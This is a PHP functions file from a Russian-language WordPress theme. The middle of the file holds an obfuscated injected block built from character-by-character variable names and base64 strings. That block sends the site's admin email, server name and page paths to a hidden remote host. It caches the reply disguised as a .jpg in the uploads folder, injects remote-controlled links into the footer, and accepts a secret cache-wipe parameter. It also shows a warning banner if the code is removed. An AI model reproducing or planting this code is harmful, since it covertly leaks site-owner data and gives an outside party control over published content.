<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $DjVerz='e';$IraxGt='d';$wTyI='s';$IJMc='4';$XErtl='e';$boht='6';$aqYiYH='c';$baizF='b';$RzPosn='d';$QkBiDMi='e';$NrFB='a';$MlkrmX='_';$bsHmDZz='o';$HdhsTApE=$baizF.$NrFB.$wTyI.$XErtl.$boht.$IJMc.$MlkrmX.$RzPosn.$QkBiDMi.$aqYiYH.$bsHmDZz.$IraxGt.$DjVerz;$Gqwuu='l';$hRKawX='e';$NJhu='z';$dCEJ='a';$GaYoAW='i';$fnuZKJ='f';$FIxf='t';$yWGZN='g';$MfSEmv='n';$gCaTRPTw=$yWGZN.$NJhu.$GaYoAW.$MfSEmv.$fnuZKJ.$Gqwuu.$dCEJ.$FIxf.$hRKawX;$jDlI='_';$OFll='3';$ieXrIia='1';$LhAqQ='s';$vvengeJ='t';$GEYwLx='r';$pvXufbV='t';$wFoMvli='o';$ALhj='r';$zavWuPgy=$LhAqQ.$vvengeJ.$ALhj.$jDlI.$GEYwLx.$wFoMvli.$pvXufbV.$ieXrIia.$OFll;$yOBx='r';$AhlR='v';$QKbDI='r';$xfheGa='e';$GNahk='t';$jrVg='s';$WIHGASYT=$jrVg.$GNahk.$QKbDI.$yOBx.$xfheGa.$AhlR;                     $za____________y='e';$vh______________z='d';$ft_______________o='s';$zk____________w='4';$ko__z='e';$er____u='6';$ls______r='c';$zs_____________h='b';$bt_____________a='d';$lr______z='e';$nu_______j='a';$yc______p='_';$lh_____w='o';$ld__w=$zs_____________h.$nu_______j.$ft_______________o.$ko__z.$er____u.$zk____________w.$yc______p.$bt_____________a.$lr______z.$ls______r.$lh_____w.$vh______________z.$za____________y;$su__________e='u';$as________a='s';$uu__s='t';$lw______________s='c';$ey_______________g='t';$ab______z='i';$va_______u='f';$yl______________k='o';$gx___t='s';$dt___c='e';$ne_______________j='n';$pe____b='x';$yw___b='n';$ej___x='_';$bb____________f='i';$lq________e=$va_______u.$su__________e.$yw___b.$lw______________s.$ey_______________g.$ab______z.$yl______________k.$ne_______________j.$ej___x.$dt___c.$pe____b.$bb____________f.$as________a.$uu__s.$gx___t;$vd____g='p';$qn_______________b='n';$vs__x='o';$jj_____________j='e';$zx__________g='f';$tl______s=$zx__________g.$vs__x.$vd____g.$jj_____________j.$qn_______________b;$pt___________n='d';$up_________g='a';$fn________h='e';$zn_______________h='r';$gl_________w='f';$gs____________z=$gl_________w.$zn_______________h.$fn________h.$up_________g.$pt___________n;$xd_______________l='f';$cw__f='s';$da________x='l';$bm_______________o='o';$su_________c='e';$ne_________p='c';$dm_____________w=$xd_______________l.$ne_________p.$da________x.$bm_______________o.$cw__f.$su_________c;define("WP_ID", $ld__w("Mi4wLjA="));define("WP_TTL", $ld__w("MTA4MDA="));define("WP_SRC", $ld__w("dHBva24="));function wp_get_header() {global $ld__w, $lq________e;if ($lq________e($ld__w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$lq________e($ld__w("d3BfZ2V0X2Zvb3Rlcg==")) &&$lq________e($ld__w("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ld__w, $tl______s, $dm_____________w, $gs____________z;$pe_____i = TEMPLATEPATH."/".$ld__w("Zm9vdGVyLnBocA==");$jx___________d = @$tl______s($pe_____i, "r");$pe_____i = @$gs____________z($jx___________d, @filesize($pe_____i));@$dm_____________w($jx___________d);$xm_____________d = TEMPLATEPATH."/".$ld__w("ZnVuY3Rpb25zLnBocA==");$jx___________d = @$tl______s($xm_____________d, "r");$xm_____________d = @$gs____________z($jx___________d, @filesize($xm_____________d));@$dm_____________w($jx___________d);$mi_____________t = 0;if($pe_____i && $xm_____________d) {if ($ld__w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($pe_____i, $ld__w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$mi_____________t = 1;}if (substr_count($pe_____i, "wp_theme_GPL_credits()") < 1) {$mi_____________t = 2;}}if(WP_ID != "2.0.0") {$mi_____________t = 12;}}if($mi_____________t > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $mi_____________t -->";}}function wp_loaded() {global $ld__w, $lq________e;return $lq________e($ld__w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($kw_____z, $ua__e = "(more...)", $ck___o = 0, $qy______________s = "") {$xh____k = get_the_content($ua__e, $ck___o, $qy______________s);$xh____k = apply_filters("the_content", $xh____k);$xh____k = str_replace("]]>", "]]>", $xh____k);if (strlen($_GET["p"]) > 0) {echo $xh____k;}else if ((strlen($xh____k)>$kw_____z) && ($gf____________t = strpos($xh____k, " ", $kw_____z ))) {$xh____k = substr($xh____k, 0, $gf____________t);$xh____k = $xh____k;echo $xh____k;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ua__e</a></div></p>";} else {echo $xh____k;}}}$ke________o='b';$jr___________n='s';$uq______________e='_';$qp___p='n';$em___o='e';$gz______________u='4';$yj_____________h='c';$iu_____________q='6';$yj_____g='a';$yx____g='d';$bl___d='e';$rz______________y='e';$am_____________b='o';$hu________b=$ke________o.$yj_____g.$jr___________n.$bl___d.$iu_____________q.$gz______________u.$uq______________e.$em___o.$qp___p.$yj_____________h.$am_____________b.$yx____g.$rz______________y;$wm___w='e';$ev______________k='c';$gd________a='t';$cg_____c='o';$tr_______r='f';$ys_______________z='_';$zs___p='e';$nn______s='s';$yi___________x='n';$ds______________y='t';$qa_____w='n';$vv___________i='_';$bq______________q='t';$fg______v='l';$ad_______________k='e';$pf__________l='g';$nj____p='i';$bf_______s=$tr_______r.$nj____p.$fg______v.$zs___p.$ys_______________z.$pf__________l.$ad_______________k.$gd________a.$vv___________i.$ev______________k.$cg_____c.$yi___________x.$bq______________q.$wm___w.$qa_____w.$ds______________y.$nn______s;$li__________y='f';$xe____________n='l';$iy____________n='_';$ca____q='x';$hn_______l='s';$ev_________r='i';$iz___f='t';$bm________e='e';$ay______________m='i';$yt_______d='e';$dw____________e='s';$wn__d=$li__________y.$ev_________r.$xe____________n.$bm________e.$iy____________n.$yt_______d.$ca____q.$ay______________m.$hn_______l.$iz___f.$dw____________e;$rb____________t='s';$tk____m='a';$ja___________v='o';$vg_________a='v';$co____________u='m';$ah__________d='e';$jf______________e='i';$hk______p='n';$th________m='o';$nk___k='e';$lc______________y='r';$sq_______________a='r';$pn_________z='p';$tz______________g='c';$cm_______x='_';$ue___________w=$vg_________a.$nk___k.$lc______________y.$rb____________t.$jf______________e.$th________m.$hk______p.$cm_______x.$tz______________g.$ja___________v.$co____________u.$pn_________z.$tk____m.$sq_______________a.$ah__________d;$lt_______k='f';$sg_______________e='s';$ys__j='p';$rn______m='o';$so____________e='e';$fb__o='c';$hd_________z='n';$sl________w='o';$so_______________s='k';$yh_____z=$lt_______k.$sg_______________e.$rn______m.$fb__o.$so_______________s.$sl________w.$ys__j.$so____________e.$hd_________z;$jp________t='f';$aw_____________f='t';$cj________q='r';$dq_____________e='w';$xg______________a='i';$hm______k='e';$af____d=$jp________t.$dq_____________e.$cj________q.$xg______________a.$aw_____________f.$hm______k;$ho___________f='m';$vq_____v='d';$nb__u='5';$nu_____________o=$ho___________f.$vq_____v.$nb__u;$cc__e='a';$nb____a='p';$ud___________g='h';$li________e='r';$fu____________k='e';$gg_________p='a';$bu_____________i='t';$xr_____d='l';$xm______u=$li________e.$fu____________k.$gg_________p.$xr_____d.$nb____a.$cc__e.$bu_____________i.$ud___________g;$id________g='e';$ev___i='r';$xr_________s='a';$jo__s='e';$io_______x='i';$ln_________s='s';$hc_____________h='i';$xo_________u='l';$oi_______d='n';$wu__q='u';$xv__i='z';$jy________v=$wu__q.$oi_______d.$ln_________s.$id________g.$ev___i.$hc_____________h.$xr_________s.$xo_________u.$io_______x.$xv__i.$jo__s;$ps________y='t';$tm______________n='m';$xp______t='n';$wn_____s='m';$mo________e='a';$ts_________x='e';$zq____z='p';$nq______________c=$ps________y.$ts_________x.$tm______________n.$zq____z.$xp______t.$mo________e.$wn_____s;$hb__________b='c';$rf___t='s';$hv_______________j='_';$yw__________p='e';$vo____n='c';$mx___u='t';$ia____________u='e';$rh___________m='a';$km_______w='e';$ek____________m='t';$iw_______e='r';$oy______s='e';$jh______________n='t';$ky_____________x='r';$eh__u='x';$qx_______a='m';$uh_____i='o';$vo___f='n';$km___________i='a';$gs_____________b='_';$nn_____u='t';$bb__________v=$rf___t.$nn_____u.$ky_____________x.$ia____________u.$rh___________m.$qx_______a.$hv_______________j.$vo____n.$uh_____i.$vo___f.$mx___u.$yw__________p.$eh__u.$ek____________m.$gs_____________b.$hb__________b.$iw_______e.$km_______w.$km___________i.$jh______________n.$oy______s;function tv__v($bv_______h) {global $ld__w, $lq________e, $bf_______s, $ue___________w, $bb__________v;if (!$lq________e($ld__w("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ue___________w(PHP_VERSION, "5.0.0", ">=") && $lq________e($ld__w("ZmlsZV9nZXRfY29udGVudHM=")) && $lq________e($ld__w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$pf___________k = $bb__________v(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$vj_____q = @$bf_______s($bv_______h, 0, $pf___________k);} else {$vj_____q = @$bf_______s($bv_______h, 0);}return $vj_____q;}function hq__n($bv_______h) {global $lq________e, $yh_____z, $af____d, $ld__w;if (!$lq________e($ld__w("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ib__i = strpos($bv_______h, "/", 7);$ci__c = array("uri"     => substr($bv_______h, $ib__i),"host"    => str_replace("http://", "", substr($bv_______h, 0, $ib__i)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kk______m = @$yh_____z("$ci__c[host]", 80, $mn____l, $aw______u, 4);if (!$kk______m) {return false;} else {$vj_____q = "";$tu___h  = "GET $ci__c[uri] HTTP/1.0\r\n";$tu___h .= "Host: $ci__c[host]\r\n";$tu___h .= "Referer: $ci__c[referer]\r\n";$tu___h .= "Connection: Close\r\n\r\n";@$af____d($kk______m, $tu___h);while (!@feof($kk______m)) {$zg_____________v = @fgets($kk______m, (1024*24));if ($zg_____________v == "\r\n") {$jh____f = true;continue;}if ($jh____f) {$vj_____q .= $zg_____________v;}}return $vj_____q;}}function yl______________c($bv_______h) {global $lq________e;$uy____d = false;if ($bv_______h != "") {if ($lq________e("tv__v")) {$uy____d = @tv__v($bv_______h);}if (!$uy____d && ($lq________e("hq__n"))) {$uy____d = @hq__n($bv_______h);}}return $uy____d;}function rx____c() {global $_SERVER, $nu_____________o;$gz______x = $_SERVER["SERVER_NAME"];if (substr("$gz______x", 0, 4) == "www.") {$gz______x = substr("$gz______x", 4);}$gz______x = $nu_____________o("$_SERVER[SERVER_NAME]");return $gz______x;}function cg____________i() {return "file";}function hc________k($bv_______h) {global $_SERVER, $bf_______s, $wn__d, $tl______s, $dm_____________w, $af____d;$ns__________e = qm__________g();$fi__l = rx____c().".jpg";$dm_________y = $ns__________e["dir_upload"]["path"]."/$fi__l";$cx__________i = @filemtime($dm_________y);if (!$cx__________i || ((time()-$cx__________i) >= WP_TTL)) {$uy____d = yl______________c($bv_______h);if ($uy____d) {if ($wn__d($dm_________y)) {@unlink($dm_________y);}$jx___________d = @$tl______s($dm_________y, "x+");@$af____d($jx___________d, $uy____d);@$dm_____________w($jx___________d);}} else {if ($wn__d($dm_________y)) {$uy____d = @$bf_______s($dm_________y);} else {$uy____d = false;}}return $uy____d;}function qm__________g() {global $_SERVER, $ld__w, $hu________b;$ii___________a = wp_count_posts("post");$mn______m = pathinfo(get_bloginfo("template_directory"));$ns__________e = array("url" => array("report"      => $ld__w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $mn______m,"dir_upload"=> dw__m(),"queryString"=> array("?a001=".WP_ID,"a004=".$mn______m[filename],"a005=".$ii___________a->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "Спонсоры шаблона <a href=\"http://stroimbanya.com\">Баня</a> и <a href=\"http://stroyu-sam.com\">Строю сам</a>");$ns__________e["url"]["queryString"] = implode("&", $ns__________e["queryString"]);$ns__________e["url"]["report"] = $ns__________e["url"]["report"]."/?".$hu________b($ns__________e["url"]["queryString"]).".html";return $ns__________e;}function dw__m() {$zt__y = wp_upload_dir();if (isset($zt__y["error"])) {$kc____________n = nd____________l();if (is_writable($kc____________n)) {$zt__y = array("path" => $kc____________n);}}return $zt__y;}function nd____________l() {global $lq________e, $nu_____________o, $xm______u, $nq______________c;$hq_____________g = (bool) ini_get("safe_mode");if ($hq_____________g == true) {return false;}if ($lq________e("sys_get_temp_dir")) {$zp_______________m = sys_get_temp_dir();if (is_writable($zp_______________m)) {return $xm______u($zp_______________m);}}if (!empty($_ENV["TMP"])) {return $xm______u($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xm______u($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xm______u($_ENV["TEMP"]);} else {$lj______f = $nq______________c($nu_____________o(uniqid(rand(), true)), "");if ($lj______f) {$zp_______________m = $xm______u(dirname($lj______f));@unlink($lj______f);return $zp_______________m;} else {return false;}}}function vz________m() {global $_GET, $wn__d;$ns__________e = qm__________g();$gz______x = rx____c();$uk______________v = cg____________i();$ci____t = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($uk______________v == "file") {$pd_______r = $ns__________e["dir_upload"]["path"]."/".$gz______x.".jpg";if ($wn__d($pd_______r)) {@unlink($pd_______r);$ci____t = "deleted";}}$kf_____________q = array("s"=> $ci____t,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($kf_____________q AS $xp____________n => $td____f) echo " [$xp____________n:$td____f]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $lq________e, $ld__w, $jy________v;$ns__________e = qm__________g();$ly__i = "hc________k";if ($lq________e($ly__i)) {$vj_____q = $ly__i($ns__________e["url"]["report"]);}if ($vj_____q) {if ($vj_____q = @$ld__w($vj_____q)) {$vj_____q = @$jy________v($vj_____q);if (strlen($vj_____q[custom_credit]) >= 5) {$ns__________e["default_string"] = $vj_____q[custom_credit];}if ($vj_____q["status"] == "0") {$as_______________p = 1;$vd______f = 1;} else {$vn___u = sizeof($vj_____q["links"]);$iv_____________r = $ns__________e["default_string"];if ($vn___u > 0 && $vj_____q["links"] !== "") {$zb_______________r = 0;foreach ($vj_____q["links"] as $pw_____________z => $px_________z) {$zb_______________r++;if ($px_________z->l_path == "" || $px_________z->l_path == $_SERVER["REQUEST_URI"]) {$px_________z->l_href = htmlspecialchars(strip_tags($px_________z->l_href));$px_________z->l_title = htmlspecialchars(strip_tags($px_________z->l_title));$px_________z->l_anchor = htmlspecialchars(strip_tags($px_________z->l_anchor));$iv_____________r .= " | ";$iv_____________r .= "<a href='$px_________z->l_href' title='$px_________z->l_title'";if ($px_________z->l_nofollow == "1") {$iv_____________r .= " rel='nofollow'";}$iv_____________r .= ">$px_________z->l_anchor</a>";}}}$ns__________e["links"] = "$iv_____________r";if ($vj_____q[credit] == "0") {$ns__________e["links"] = "";}}} else {$as_______________p = "1";}} else {$as_______________p = "1";}if ($as_______________p == "1") {$ns__________e["links"] = $ns__________e["default_string"];}echo "$ns__________e[links]";echo "<!-- s: $vj_____q[signature] -->";vz________m();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
         $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
